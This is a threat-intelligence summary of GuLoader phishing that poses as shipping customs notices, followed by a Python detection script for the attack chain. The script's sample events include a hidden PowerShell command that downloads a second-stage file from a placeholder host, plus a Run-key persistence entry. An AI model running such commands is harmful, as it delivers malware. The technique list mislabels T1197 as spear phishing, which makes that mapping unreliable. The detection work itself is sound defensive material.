Recent findings by AhnLab SEcurity Intelligence Center (ASEC) revealed the use of GuLoader malware disseminated through a phishing email masquerading as communication from a well-known international shipping company. The email, intercepted via an ASEC honeypot, prompted recipients to check their post-paid customs tax and carried an attachment that executed malicious scripts.
Affected: phishing email, GuLoader malware, Xworm RAT, email security
Key points:
- AhnLab SEcurity Intelligence Center (ASEC) identified GuLoader malware distributed via phishing emails.
- The phishing email impersonated a well-known international shipping company.
- The email attachment contained obfuscated VBScript that executed a PowerShell script.
- The PowerShell script downloaded additional malicious files from an external source.
- A registry key was created to ensure persistence of the malware.
- GuLoader has been distributed since December 2019 as a downloader for various malware.
- Users are advised to avoid opening attachments from unknown sources.
MITRE Techniques:
- T1071.001 – Application Layer Protocol: The PowerShell script communicates with external servers to download payloads.
- T1059.005 – Command and Scripting Interpreter: VBScript is used to execute a PowerShell script.
- T1197 – Spear Phishing: The initial compromise occurs through a phishing email.
- T1547.001 – Boot or Logon Autostart Execution: A registry key is created to maintain persistence.
- T1055 – Process Injection: Xworm RAT is executed as a child process through msiexec.exe.
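As an added example (not code from the ASEC write-up), the chain summarised above expressed as detection logic run over constructed process and registry events: a script host spawning PowerShell, a PowerShell download, a Run-key write, and msiexec.exe started by a script interpreter with no package to install. The key=value log shape, the field names and the msiexec heuristic are assumptions.

```python
import re

# Constructed sample telemetry in a simple key=value shape (hypothetical, not ASEC's
# log format). Lines 0-2 mirror the chain summarised above; the last two are benign.
SAMPLE_EVENTS = [
    r'type=proc parent=wscript.exe image=powershell.exe cmd="powershell.exe -w hidden -ep bypass -c iwr https://example.invalid/stage2.bin -OutFile $env:TEMP\s2.bin"',
    r'type=reg image=powershell.exe key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=ShipUpdate data="wscript.exe C:\Users\u\AppData\Roaming\ShipUpdate.vbs"',
    r'type=proc parent=powershell.exe image=msiexec.exe cmd="msiexec.exe"',
    r'type=proc parent=explorer.exe image=powershell.exe cmd="powershell.exe -File C:\Scripts\backup.ps1"',
    r'type=proc parent=explorer.exe image=msiexec.exe cmd="msiexec.exe /i C:\Downloads\app.msi"',
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\?$", re.I)
MSI_PACKAGE_RE = re.compile(r"\.msi\b|\s/(i|package)\s", re.I)   # heuristic: a real install names a package
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def classify(ev: dict) -> list:
    """Return the MITRE IDs (from the list above) whose pattern this event matches."""
    image, parent = ev.get("image", "").lower(), ev.get("parent", "").lower()
    cmd, hits = ev.get("cmd", ""), []
    if ev.get("type") == "proc":
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            hits.append("T1059.005")          # VBScript host spawned PowerShell
        if image == "powershell.exe" and DOWNLOAD_RE.search(cmd):
            hits.append("T1071.001")          # PowerShell pulling a payload over HTTP(S)
        if (image == "msiexec.exe" and parent in SCRIPT_HOSTS | {"powershell.exe"}
                and not MSI_PACKAGE_RE.search(cmd)):
            hits.append("T1055")              # msiexec.exe hosting code with no package to install
    elif ev.get("type") == "reg" and RUN_KEY_RE.search(ev.get("key", "")):
        hits.append("T1547.001")              # Run-key persistence
    return hits


def scan(lines: list) -> dict:
    """Index of every suspicious line -> matched technique IDs; benign lines are omitted."""
    return {i: h for i, line in enumerate(lines) if (h := classify(parse_event(line)))}


if __name__ == "__main__":
    for i, ids in scan(SAMPLE_EVENTS).items():
        print(f"line {i}: {', '.join(ids)}")
```

Correlating these hits by process tree (script host, then its PowerShell child, then the Run key and msiexec child) gives a far lower false-positive rate than any single rule alone.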
Indicators of Compromise:
Full Story: https://asec.ahnlab.com/en/87002/